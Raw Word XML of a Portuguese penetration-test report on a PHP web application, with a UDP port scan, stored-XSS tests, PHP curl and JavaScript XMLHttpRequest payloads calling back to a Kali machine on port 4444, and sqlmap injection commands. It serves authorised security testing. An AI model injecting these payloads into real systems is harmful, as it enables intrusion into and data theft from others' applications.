        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pp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14:paraId="34D6BA79" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wbt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-server</w:t>
      </w:r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– serviço de gerenciamento de hosts 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CBC8AB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822C215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14:paraId="487C888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C8E884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varrer as portas 1 a 65.535 do sistema usando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e portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330EA81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</w:p>
    <w:p w14:paraId="545453D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2219A94" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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é utilizado para executar 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1E33E514" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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” indica o uso do detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E7E46A" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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“-p” indicará quais as portas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erão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usadas na varredura, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2632A089" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F455C1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</w:p>
    <w:p w14:paraId="22E9F02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sultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE413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descobrir as portas abertas UDP, os serviços que essas portas rodam no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F088DE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39D115" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205">
      <w:p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4316E28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De acordo com a Figura 14, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foi possível descobrir as portas abertas e os serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFC3A7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7632" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B31095C" wp14:editId="7340BFCC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>120015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>202565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5181600" cy="3463290"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTight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BCBA2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igura 14 – Portas UDP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5E9FEEF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89FC09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Serviços encontrados na Figura 14:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AC3D8A" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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n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14:paraId="61C1CB6B" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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spellEnd"/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dgm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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5C47A" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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snm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14:paraId="0C6F58C9" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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4D41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- protocol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compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ADD00B" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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2TP</w:t>
      </w:r>
      <w:r w:rsidRPr="004D41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D418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(Protocolo de Encapsulamento de Camada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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D418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  <w:r w:rsidRPr="004D41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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7512F23C" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-t-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lik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72E3E97F" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nt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[3] - protocolo de sincronização de relógios                             usando UDP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C819729" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0290DAA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A20516C" w14:textId="55580328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4.3.4.2 Tela Cadastro Lotes – Exploração via XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E0442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AA435B2" w14:textId="7868A941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arefa realizada dia 19/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ACE9F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: 1 hora e 10 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C97463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26DCEB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A07D2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ED206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bjetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFFD50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Descobrir se os campos da tela de Cadastro Lotes são vulneráveis ao ataque XSS Armazenado. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349B1779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E058D2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05BC3E4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1AE7A1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Inserir em um dos campos o seguinte código:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8EC30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&lt;script&gt; </w:t>
      </w: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alert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(</w:t>
      </w:r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“oi”);&lt;/script&gt; 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>no campo Marca/Fabricante</w:t>
      </w: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4D4181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28DDF63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Caso a aplicação não realize um tratamento adequado dos dados inseridos, ao serem carregados pelo banco de dados, esses dados devem produzir um pop-up com o texto “oi”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663B2E5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076D865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0FC77D1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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Espera-se que o sistema realize um tratamento nos dados de entrada e o código inserido não seja executado quando a página carregar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315B74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324672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4694EBC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>O sistema não passou nos testes. Conforme mostra a Figura 15, foi constatado que a aplicação não está fazendo o tratamento adequado para a inserção de códigos mal-intencionados nos campos da tela em questão.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A24F64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708A6E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18656" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="160AE9DA" wp14:editId="3BBA03AC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>72390</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="3998595"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapTight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7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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 15 – Resultado teste XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F7029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C2A660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998706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14:paraId="79DD9F4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6339C0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Através d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, estabelecer uma conexão entre a máquina virtual utilizada para testes, a qual utiliza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Kali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Linux, e a máquina que hospeda o sistema explorado para acessar o sistema operacional dessa última.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5203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Sabendo que o sistema utiliza a linguagem PHP, os testes realizados na Sessão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e Sessão 3 utilizarão códigos PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0D05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DA6747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Passos utilizados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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CE3280" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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tilizar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abrir um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a porta 4444 da máquina virtual utilizada para testes, usando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isponível em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Auxiliary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ulti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Handl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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7274205A" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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sar um comando GET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abrir a conexão da máquina que hospeda o sistema explorado com a máquina virtual utilizada para testes na porta indicada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0A245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14:paraId="5C20089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Comando a ser utilizado no XSS, o código abaixo tenta abrir uma conexão do tipo ‘GET’ com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kali_linux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na porta 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F5BE7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&lt;?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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="159833D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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$curl =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in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'http://IP_do_kali_linux:4444');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B08C44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exec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$curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F7C9C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close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$curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C672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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F28E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BDFF93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Caso não haja o devido tratamento,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aberto na porta 4444 deve criar uma conexão entre a máquina hospeda a aplicação e a máquina utilizada para testes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A684C4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E44355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59BE03E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A aplicação deve realizar o tratamento para impedir o comando de ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A84D1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14:paraId="78A36B6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305D84F9" w14:textId="03CE4B7D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sistema passou nos testes. A sessão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, abordado no subcapítulo 3.2, não foi aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC323D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F42D1B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1740E74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14:paraId="0C5B622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8D1BFF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Alterar o comando utilizado na Sessão de teste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para tentar descobrir o que impediu a sessão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ser aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BF723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88D033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lastRenderedPageBreak/>
        <w:t xml:space="preserve">O código abaixo tenta abrir uma conexão com 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IP_do_kali_linux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na porta 4444 e caso haja u erro exibe o problema num pop-up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C0418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E9E798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&lt;?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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="50A95E0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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$curl =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in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'http://IP_do_kali_linux:4444');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8903B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if(</w:t>
      </w:r>
      <w:proofErr w:type="gram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!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curl_exec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($curl)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5F6C4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D4181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javascript:</w:t>
      </w:r>
      <w:proofErr w:type="gram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alert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curl_error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lang w:val="en-US"/>
        </w:rPr>
        <w:t>($curl));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC9A48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}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74B8B21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curl_close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($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curl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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9421C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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E07C7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4141C2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1289CB9C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A aplicação deve realizar o tratamento para impedir o comando de ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54CA4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EE1F9B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0E36949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14:paraId="5EF0136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B25B52E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A4803A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D7F4BB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14:paraId="44D4849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7EFB32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Ao contrário das sessões de testes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e 3, que utilizaram códigos PHP, aqui serão utilizados códigos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uro. Uma vez que, códigos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odem ser lidos por qualquer navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B9BE2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BFF0B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e tenta realizar uma chamada Ajax do tipo GET para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P_do_kali_linux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a porta 4444, de forma síncrona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0781CE6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9D83B48" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16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4D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17670849" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">r = new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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B584CD" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181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D4181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Pr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET",’http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://IP_do</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_kali_linux</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:4444’,false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB493B9" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16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r.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16940596" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A162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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A71C1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0EE6F7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0636BD1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esperado é que a aplicação realize tratamento para impedir o código de ser executado. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFFD57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DAD417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B49F2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9CAC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6FF4C54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sistema não passou nos testes. Independente da sessão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ão ser aberta, o código conseguiu ser inserido e executado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C41FDC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AB291C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F8FD6F0" w14:textId="61917D70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4.3.4.3 Tela Cadastro Lotes – Exploração via SQL </w:t>
      </w:r>
      <w:proofErr w:type="spell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07E20"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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B07E20" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SqlMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C3585E2" w14:textId="374A8B40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arefa realizada dia 19/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E20F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: 1 hora e 22 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22248DB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F5D45F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14:paraId="6853416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entar realizar consultas não autorizadas no banco de dados por meio da injeção de SQL nos campos da tela de Cadastro Lotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D009FF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C05FCF4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0CC6134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DD6CC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Descobrir se o campo Marca/Fabricante é vulnerável a SQL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através das aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA2985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14:paraId="0ABADBC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1</w:t>
      </w:r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‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8D640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442AC5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Kalium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campo para SQL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. Imagina-se que haja por baixo uma instrução SQL que possua </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD9887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where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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param1 = &lt;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parametro_na_interface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&gt;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and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… </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00557D4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AB3AEC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Caso a aplicação não fizesse o devido tratamento do comando inserido e a instrução fosse ser modificada para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where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param1</w:t>
      </w:r>
      <w:proofErr w:type="gram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gram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= 1 ‘ . </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O que ocasionaria um erro de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4626E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04E21E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1077CCE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a aplicação realize o tratamento dos caracteres para impedir que sejam interpretados como trecho da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB700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F06E29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763081D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sistema passou nos testes. Colocando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‘ no campo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Marca/Fabricante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o cadastro aconteceu normalmente. Isso indica que a aplicação está fazendo um tratamento adequado para os dados de entrada e por isso o campo não é vulnerável.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF2090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950DEA9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14:paraId="7E7AA4B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20D66C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sar a ferramenta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para realizar testes de injeção de SQL na página Cadastro Lotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172CD4F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Através d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, capturar a requisição POST realizada para o acesso à página em questão e salvar em um arquivo a parte para que esses dados possam ser utilizados pel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posteriormente. [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF28DB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D33E06D" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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r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-p --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current-db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A3596D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4E9208E" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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0E92CEFE" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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comando “-r” informa que as instruções do ataque devem ser carregadas no arquivo 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311B8CDD" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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“-p” indica o parâmetro a ser injetado pel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, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7C2AB" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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-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current-db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solicita que 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que tente descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F3DF6F" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205">
      <w:p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DCF597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76A860F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a aplicação faça o tratamento dos parâmetros, não permitindo que eles sejam vulneráveis à injeção de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D57D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33FF19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17239B2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rro na ferramenta. O parâmetro não foi indicado corretamente no comando utilizado. Dessa forma, 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não reconheceu o parâmetro, que está no arquivo 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4C02E4B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60DA610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A87C44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3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7EB42F57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891982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3A488A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Alterar o comando utilizado na Sessão de teste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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para indicar corretamente o parâmetro a ser testado pelo </w:t>
      </w:r>
      <w:proofErr w:type="spell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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1AAB1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O comando do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pede que seja informado um parâmetro para possível injeção de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C22249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4E368A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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando utilizado: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181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4D4181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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current-db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1332FC2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5FF4493" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF672EC" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3B86E" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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“-p” indica o parâmetro que deve ser injetado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pel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, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E70EA2" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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descrição” é o parâmetro que sofrerá a sessão de teste de injeção SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2918F1" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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lastRenderedPageBreak/>
        <w:t>“--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current-db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
